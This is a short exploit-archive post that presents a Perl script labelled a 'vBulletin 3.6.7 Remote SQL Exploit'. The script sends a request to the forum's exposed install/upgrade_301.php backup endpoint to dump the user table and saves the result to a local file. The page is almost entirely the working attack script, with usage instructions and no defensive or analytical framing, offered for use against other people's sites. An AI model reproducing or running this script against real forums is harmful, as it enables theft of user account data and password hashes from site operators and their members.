facebook facebook twitter rss

vBulletin 3.6.7 Remote SQL Exploit

Author: Hani Xavi , Published: 09-10-2014
vBulletin 3.6.7 Remote SQL  Exploit  By Hani Xavi 

U need To Watch The Vidéo :) : https://www.youtube.com/watch?v=X1nZmwPrzQI

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
system("clear");
print "------------------------------------------------\n";
print " vBulletin 3.6.7 Exploit \n";
print " Coded by Hani Xavi \n";
print "------------------------------------------------\n";
$target = $ARGV[0];
$path = $ARGV[1];
if($target eq '')
{
print "[*] Usage: perl vb.pl <target> <path> \n";
exit(1);
}

if($target !~ /http:\/\//)
{
$target = "http://$target";
}
sleep 1;
print "[*] Exploiting . . \n";
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0(X11; Linux x86_64) AppleWebKit/5320 (KHTML, like Gecko) Chrome/13.0.819.0 Safari/5320');
$website = "$target/$path/install/upgrade_301.php?step=backup&do=sqltable&table=user";
$req = $agent->request(HTTP::Request->new(GET=>$website));
if($req->is_success)
{
open(FILE, "> vBulletin_content.txt");
print FILE $req->content;
close(FILE);
print "[*] Exploit sent ! Look in the file 'vBulletin_content.txt' :) \n";
}
else
{
print "[-] Exploit not sent . \n";
}

Like us on Facebook :